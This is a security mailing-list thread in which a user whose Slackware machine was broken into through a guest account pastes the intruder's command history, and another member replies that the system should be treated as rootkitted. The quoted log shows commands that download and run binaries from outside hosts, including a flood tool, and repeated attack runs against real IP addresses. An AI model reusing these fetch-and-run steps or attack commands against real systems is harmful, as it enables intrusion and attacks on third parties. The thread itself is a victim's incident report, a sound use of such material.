From the URLs and IPs, it looks like a Romanian hacker. There are a few
interesting exploits there.
When I get some time I'll look through them and make some guesses as to
what he is doing.
At this point you shoud consider your machine rootkitted and suspect.
- Ian
Tevfik Yucek wrote:
>Hi all,
>
>
>Last night I realize there was someone in my computer, Slackware 10.
>I have a sshd running and he/she/it is connected to my computer and
>executed the following commands.
>
>I am usually not concerned with security and did not care about much
>until yesterday. I had a guest "user" account with password "guest"
>and he/she/it used it.
>
>So, here are my questions:
> - how he/she/it knows about my IP and how did the know I was
>using linux and how did he/she/it got the password? Just guessing?
> - how can I kick a user if I notice that I have and uninvited
>visitor. I had to stop the internet connection of my computer.
> - what does the command below do and should I do something about
>them ?
>
>
>Thanks,
>Tevfik
>
>Here are the commmands:
>
>passwd
>cat /etc/issue
>cd /tmp
>mdkri .src
>cd .src
>mkdir .src
>cd .src
>wget carmelo.go.ro/do.tgz
>tar zxvf do.tgz
>rm -rf do.tgz
>./do
>./do
>wget 0kas.com/prt.tgz
>tar zxvf prt.tgz
>./x
>./x
>./x
>./x
>./x
>./x
>wget stefang.com/prostii/n
>chmod +x n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>ls
>./n
>./x
>./x
>./x
>wget yahaa.at/p/90
>./90
>chmod +x 90
>./90
>./90
>wget 0kas.com/Florin/flood.tar.gz
>tar zxvf flood.tar.gz
>rm -rf flood.tar.gz
>ls
>rm -rf prt.tgz
>ls
>rm -rf prt.tgz
>cd belea
>./stealth 218.38.3.83 53
>cd /tmp/.src/belea
>./stealth 80.97.245.241 53
>
>
>./stealth
>^[[A
>
>w
>cd /tmp/.src
>cd belea
>./steath 82.208.160.155 53
>./steath 82.208.160.155 53
>./steath 82.208.160.155 53
>./stealth 82.208.160.155 53
>./stealth 82.208.160.155 53
>export PATH="."
>bash
>cd /tmp/.src/belea
>w
>w
>cat psybnc.conf
>locate psybnc.conf
>./stealth 213.154.149.199 53
>w
>./stealth 213.233.97.53 53
>./stealth 194.105.27.21 80
>./stealth 81.196.147.218 53
>./stealth 81.196.59.83 80
>./stealth 81.196.59.83 53
>cd /tmp/.src
>cd belea
>./stealth 80.96.146.171 53
>cd /tmp/ .scr/belea
>./stealth 81.196.147.170 53
>./stealth 81.196.147.170 55
>./stealth 81.196.147.170 53
>./stealth 211.47.141.43 53
>cd .src
>ce belea
>cd belea
>./stealth 211.47.141.43
>./stealth 211.47.141.43 53
>./stealth 211.47.141.43 53
>w
>-----------------------------------------------------------------------
>This list is provided as an unmoderated internet service by Networked
>Knowledge Systems (NKS). Views and opinions expressed in messages
>posted are those of the author and do not necessarily reflect the
>official policy or position of NKS or any of its employees.
>
>
-----------------------------------------------------------------------
This list is provided as an unmoderated internet service by Networked
Knowledge Systems (NKS). Views and opinions expressed in messages
posted are those of the author and do not necessarily reflect the
official policy or position of NKS or any of its employees.
This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 15:16:12 EDT